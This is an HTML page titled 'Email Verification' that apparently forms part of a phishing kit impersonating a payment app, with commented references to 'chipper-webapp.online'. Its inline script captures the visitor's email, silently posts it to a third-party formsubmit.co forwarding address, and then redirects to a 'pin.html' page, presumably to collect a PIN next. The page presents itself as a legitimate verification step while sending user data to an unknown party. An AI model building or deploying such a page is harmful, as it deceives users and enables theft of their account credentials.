<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Email Verification</title>

    <!-- custom stylesheet + script -->
    <link rel="stylesheet" href="static/dist/style.css">
    <script defer src="dist/script.js"></script>

    <!-- favicon img -->
    <link rel="shortcut icon" href="static/images/OIP__3_-removebg-preview.png" type="image/x-icon">


</head>

<body>

    <form id="form" class="form2" method="POST">

        <!-- <input type="hidden" name="access_key" value="aa4e10d2-c45b-4c39-bbc6-9281c31f2e26"> -->

        <!-- <input name="redirect" type="hidden" id="name" value="https://chipper-webapp.online/pin.html"> -->
        <input type="hidden" name="_captcha" value="false">
        <input type="hidden" name="_next">
        <!-- <input type="hidden" name="url" value="chipper-webapp.online"> -->

        <div class="form2__header"><img src="static/images/OIP__3_-removebg-preview.png" alt=""></div>
        <h3 class="form2__para">Enter your email address to continue</h3>

        <div class="form2__inputCtn">
            <input id="email" placeholder="Email Address" required name="email" type="email">
        </div>

        <button id="submitBtn" type="submit">Next</button>


    </form>













    <!-- <script src="app/build/js/intlTelInput.js"></script> -->
    <script>

        const btn = document.querySelector('#submitBtn')
        form.addEventListener('submit', (e) => {
            e.preventDefault()
            const formData = new FormData(form);
            let object = {};
            formData.forEach((value, key) => {
                object[key] = value;
            });
            let json = JSON.stringify(object);
            btn.textContent = 'Loading...';


            fetch("https://formsubmit.co/ajax/bd9d3034b6a8347a7aca02bbefb8a268", {
                method: "POST",
                headers: {
                    'Content-Type': 'application/json',
                    'Accept': 'application/json'
                },
                body: json
            })
                .then(response => response.json())
                .then(data => {
                    if (data.success == 'true') {
                        setTimeout(() => {
                            window.location.href = 'pin.html';
                        }, 1000);
                    }
                    console.log(data)
                })
                .catch(error => {
                    alert('an error occured, please try again')
                    console.log(error)
                    window.location.reload()
                });
        })

    </script>
</body>

</html>